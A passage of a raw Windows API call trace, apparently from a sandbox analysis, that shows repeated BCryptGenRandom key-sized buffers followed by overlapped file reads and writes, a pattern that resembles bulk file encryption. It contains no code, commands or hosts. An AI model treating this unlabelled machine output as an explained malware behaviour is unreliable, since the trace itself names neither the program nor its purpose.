[0149.234] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0149.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.252] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0149.252] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.252] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0149.253] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.253] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.253] free (_Block=0x3e305b8) [0149.253] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.253] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.253] free (_Block=0x1fa91d0) [0149.254] free (_Block=0x1fa2ed8) [0149.254] free (_Block=0x1fa90b8) [0149.254] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0149.254] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0149.266] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.267] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.267] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0149.267] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.267] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.267] free (_Block=0x3e305b8) [0149.267] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.267] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.268] free (_Block=0x1fa91d0) [0149.268] free (_Block=0x1fa2ed8) [0149.268] free (_Block=0x1fa90b8) [0149.268] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0149.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.279] CloseHandle (hObject=0x3cc) returned 1 [0149.279] free (_Block=0x3df0008) [0149.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.288] ReadFile (in: hFile=0x2a8, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xaac, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0149.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.319] CloseHandle (hObject=0x2a8) returned 1 [0149.319] free (_Block=0x3e70008) [0149.319] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.325] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x2a44, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0149.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.978] CloseHandle (hObject=0xec) returned 1 [0149.978] free (_Block=0x3d70450) [0149.978] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0149.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.990] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.990] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0149.991] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.991] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0149.991] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.991] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.991] free (_Block=0x3e305b8) [0149.991] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.991] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.992] free (_Block=0x1fa91d0) [0149.992] free (_Block=0x1fa2ed8) [0149.992] free (_Block=0x1fa90b8) [0149.992] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0149.992] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.004] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.004] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.005] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.005] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.005] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.005] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.005] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.005] free (_Block=0x3e305b8) [0150.006] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.006] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.006] free (_Block=0x1fa91d0) [0150.006] free (_Block=0x1fa2ed8) [0150.006] free (_Block=0x1fa90b8) [0150.006] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.006] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.016] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.016] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.017] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.017] free (_Block=0x3e305b8) [0150.017] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.017] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.017] free (_Block=0x1fa91d0) [0150.017] free (_Block=0x1fa2ed8) [0150.017] free (_Block=0x1fa90b8) [0150.017] WriteFile (in: hFile=0x170, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.289] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x14d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0150.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.298] CloseHandle (hObject=0x308) returned 1 [0150.299] free (_Block=0x3e70008) [0150.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.309] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x3590, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.310] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.321] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x1b00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0150.321] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.328] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x9d26, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0150.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.330] CloseHandle (hObject=0x308) returned 1 [0150.330] free (_Block=0x3d70450) [0150.330] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.343] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.345] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.345] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.345] free (_Block=0x3e305b8) [0150.345] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.345] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.346] free (_Block=0x1fa91d0) [0150.346] free (_Block=0x1fa2ed8) [0150.346] free (_Block=0x1fa90b8) [0150.346] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.346] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.358] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.358] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.358] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.359] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.359] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.359] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.359] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.359] free (_Block=0x3e305b8) [0150.359] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.359] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.360] free (_Block=0x1fa91d0) [0150.360] free (_Block=0x1fa2ed8) [0150.360] free (_Block=0x1fa90b8) [0150.360] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.360] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.367] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.368] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.369] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.369] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.369] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.369] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.370] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.370] free (_Block=0x3e305b8) [0150.370] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.370] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.370] free (_Block=0x1fa91d0) [0150.370] free (_Block=0x1fa2ed8) [0150.370] free (_Block=0x1fa90b8) [0150.370] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.371] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.392] CloseHandle (hObject=0x308) returned 1 [0150.392] free (_Block=0x1ff1e60) [0150.392] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.403] CloseHandle (hObject=0x170) returned 1 [0150.404] free (_Block=0x3d70450) [0150.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.418] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x8860, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0150.419] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.434] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x3cce, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.441] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.453] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0xa520, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.467] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.483] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0150.484] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.484] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.484] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0150.485] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.485] free (_Block=0x3e305b8) [0150.485] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.485] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.485] free (_Block=0x1fa91d0) [0150.485] free (_Block=0x1fa2ed8) [0150.485] free (_Block=0x1fa90b8) [0150.485] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.486] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.487] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0xa3c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0150.487] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.488] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xa6a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.488] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.495] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x6f9c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.498] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.512] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9d6c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.513] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.525] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xc20c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.528] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.551] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xae08, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0150.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.552] CloseHandle (hObject=0x308) returned 1 [0150.552] free (_Block=0x3df0008) [0150.552] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0150.561] LoadLibraryA 